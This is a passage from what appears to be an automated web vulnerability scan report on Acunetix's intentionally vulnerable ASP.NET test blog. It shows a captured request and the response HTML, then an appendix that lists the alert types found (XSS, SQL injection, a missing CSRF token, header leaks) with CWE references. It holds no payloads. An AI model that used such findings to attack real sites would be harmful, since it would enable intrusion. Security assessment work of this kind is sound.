          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8%2F4bzlRmUHIna4LG5&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLpus%2FwCAK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ8DK3Y7%2FBz6vaeG4S8AOaGVC7NUiA%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 12371
          
          
          Response body (12371 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Solution

          Force UTF-8 for all text content in both the HTTP header and meta tags in HTML or encoding declarations in XML.

Appendix

Alert types

This section contains additional information on the types of alerts in the report.

  1. Cross Site Scripting (Persistent)

    Source raised by an active scanner (Cross Site Scripting (Persistent))
    CWE ID 79
    WASC ID 8
    Reference
    1. http://projects.webappsec.org/Cross-Site-Scripting
    2. http://cwe.mitre.org/data/definitions/79.html
  2. Cross Site Scripting (Reflected)

    Source raised by an active scanner (Cross Site Scripting (Reflected))
    CWE ID 79
    WASC ID 8
    Reference
    1. http://projects.webappsec.org/Cross-Site-Scripting
    2. http://cwe.mitre.org/data/definitions/79.html
  3. SQL Injection

    Source raised by an active scanner (SQL Injection)
    CWE ID 89
    WASC ID 19
    Reference
    1. https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html
  4. Viewstate without MAC Signature (Unsure)

    Source raised by a passive scanner (Viewstate)
    CWE ID 642
    WASC ID 14
    Reference
    1. http://msdn.microsoft.com/en-us/library/ff649308.aspx
  5. X-Frame-Options Header Not Set

    Source raised by a passive scanner (X-Frame-Options Header)
    CWE ID 1021
    WASC ID 15
    Reference
    1. https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
  6. Cookie without SameSite Attribute

    Source raised by a passive scanner (Cookie without SameSite Attribute)
    CWE ID 1275
    WASC ID 13
    Reference
    1. https://tools.ietf.org/html/draft-ietf-httpbis-cookie-same-site
  7. Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s)

    Source raised by a passive scanner (Server Leaks Information via "X-Powered-By" HTTP Response Header Field(s))
    CWE ID 200
    WASC ID 13
    Reference
    1. http://blogs.msdn.com/b/varunm/archive/2013/04/23/remove-unwanted-http-response-headers.aspx
    2. http://www.troyhunt.com/2012/02/shhh-dont-let-your-response-headers.html
  8. Timestamp Disclosure - Unix

    Source raised by a passive scanner (Timestamp Disclosure)
    CWE ID 200
    WASC ID 13
    Reference
    1. http://projects.webappsec.org/w/page/13246936/Information%20Leakage
  9. X-AspNet-Version Response Header

    Source raised by a passive scanner (X-AspNet-Version Response Header)
    CWE ID 933
    WASC ID 14
    Reference
    1. https://www.troyhunt.com/shhh-dont-let-your-response-headers/
    2. https://blogs.msdn.microsoft.com/varunm/2013/04/23/remove-unwanted-http-response-headers/
  10. X-Content-Type-Options Header Missing

    Source raised by a passive scanner (X-Content-Type-Options Header Missing)
    CWE ID 693
    WASC ID 15
    Reference
    1. http://msdn.microsoft.com/en-us/library/ie/gg622941%28v=vs.85%29.aspx
    2. https://owasp.org/www-community/Security_Headers
  11. 缺少反CSRF令牌

    Source raised by a passive scanner (缺少反CSRF令牌)
    CWE ID 352
    WASC ID 9
    Reference
    1. http://projects.webappsec.org/Cross-Site-Request-Forgery
    2. http://cwe.mitre.org/data/definitions/352.html
  12. 字符集不匹配 (Header Versus Meta Content-Type Charset)

    Source raised by a passive scanner (字符集不匹配)
    CWE ID 436
    WASC ID 15
    Reference
    1. http://code.google.com/p/browsersec/wiki/Part2#Character_set_handling_and_detection